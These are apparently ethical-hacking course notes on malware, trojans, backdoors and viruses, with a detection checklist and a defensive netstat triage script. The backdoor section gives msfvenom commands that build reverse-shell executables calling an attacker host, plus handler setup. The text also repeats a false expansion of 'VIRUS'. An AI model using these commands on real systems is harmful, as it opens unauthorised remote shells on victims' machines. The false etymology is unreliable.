
Malware Threats

What is Malware?

Malware is a program in which malicious or harmful code is contained inside
apparently harmless programming or data in such a way that it can get
control and cause damage, such as ruining the file allocation table on
your hard disk.

Examples: Trojans, viruses, adware, spyware, ransomware, etc.


What is a Trojan?

A Trojan is a program that looks and behaves like a legitimate file in terms of
filename and extension. When the victim, believing it to be a legitimate file,
executes it, it tries to steal the victim's information and send it back to the
attacker.

Trojans replicate, spread, and get activated upon certain predefined user
actions.
Communication Paths
Indications of Trojan Attack
Ways to infect a Target
Trojan Creation
Trojan Detection

1. Scan for suspicious OPEN PORTS
2. Scan for suspicious RUNNING PROCESSES
3. Scan for suspicious DEVICE DRIVERS INSTALLED
4. Scan for suspicious REGISTRY ENTRIES
5. Scan for suspicious WINDOWS SERVICES
6. Scan for suspicious STARTUP PROGRAMS
7. Scan for suspicious FILES AND FOLDERS
8. Scan for suspicious NETWORK ACTIVITIES
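
Steps 1, 2 and 8 of the checklist above, as an added example that is not part of the original slides: a Python triage pass over `netstat -ano` output joined with a PID-to-image map. The sample output, process map, allowlist and the `triage` helper are constructed for illustration and must be tuned to the host's own baseline.

```python
import re

# Constructed sample of Windows `netstat -ano` output (not from the original page).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       5120
  TCP    192.168.1.20:49712     203.0.113.10:443       ESTABLISHED     3344
  TCP    192.168.1.20:49800     198.51.100.7:7777      ESTABLISHED     6012
"""
# Constructed PID -> image name map, as `tasklist` would report it.
PROCESSES = {4: "System", 912: "svchost.exe", 3344: "chrome.exe",
             5120: "updater.exe", 6012: "cmd.exe"}

# Assumptions: the listeners this host is expected to expose, and the
# interpreters that should not normally own a network connection.
EXPECTED_LISTENERS = {135, 445}
SHELLS = {"cmd.exe", "powershell.exe"}

ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")

def triage(netstat_text, processes):
    """Return (reason, detail, pid, image) tuples for connections worth a look."""
    findings = []
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header, UDP or blank line
        _, lport, raddr, rport, state, pid = m.groups()
        lport, pid = int(lport), int(pid)
        image = processes.get(pid, "<unknown>")
        if state == "LISTENING" and lport not in EXPECTED_LISTENERS:
            # Checklist item 1: a port open that the baseline does not explain.
            findings.append(("unexpected-listener", lport, pid, image))
        elif state == "ESTABLISHED" and image.lower() in SHELLS:
            # Items 2 and 8: a command shell holding a live remote connection.
            findings.append(("shell-with-socket", f"{raddr}:{rport}", pid, image))
    return findings

if __name__ == "__main__":
    for finding in triage(NETSTAT_SAMPLE, PROCESSES):
        print(finding)
```
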
Open ports Checking
Process Checking
Suspicious Driver Check
Backdoor

A backdoor in a computer system is a method of bypassing normal
authentication, securing unauthorized remote access to a computer,
obtaining access to plaintext, and so on, while attempting to remain undetected.
Creating Backdoor using msfvenom
msfvenom -p <payload name> LHOST=<Attacker IP> LPORT=<Attacker PORT> -f <format> -o <filename.exe>

msfvenom -p windows/shell_reverse_tcp LHOST=49.204.12.355 LPORT=7777 -f exe -o backdoor.exe

msfvenom -p linux/x86/shell_reverse_tcp LHOST=49.204.12.355 LPORT=7777 -f elf -o backdoor
Accessing Backdoor with msfconsole

service postgresql start
msfconsole
use multi/handler
set payload <Payload>
set LHOST <Attacker IP>
set LPORT <Attacker PORT>
exploit
Viruses
VIRUS stands for Vital Information Resource Under Seize, which simplifies the
definition of a virus to the small concept of destroying or damaging something.
Creating a Virus Using Batch File Programming or Bash Commands
Batch file programming is a useful way to automate jobs in the Windows operating
system: administrators can write repetitive tasks into a file and simply run that
file instead of executing every command one after another.
Similarly, in Linux you can use shell scripting, or write a series of commands
one after another in a file, so that all of the commands are executed
automatically whenever an administrator runs it.

Hackers use this batch and bash scripting knowledge to create dangerous
viruses which can destroy data on a victim machine or consume all of the PC's
resources to make the PC either crash or slow down.
Creating a Complicated Virus
People who have strong programming knowledge can easily create their own viruses.
Source: Internet
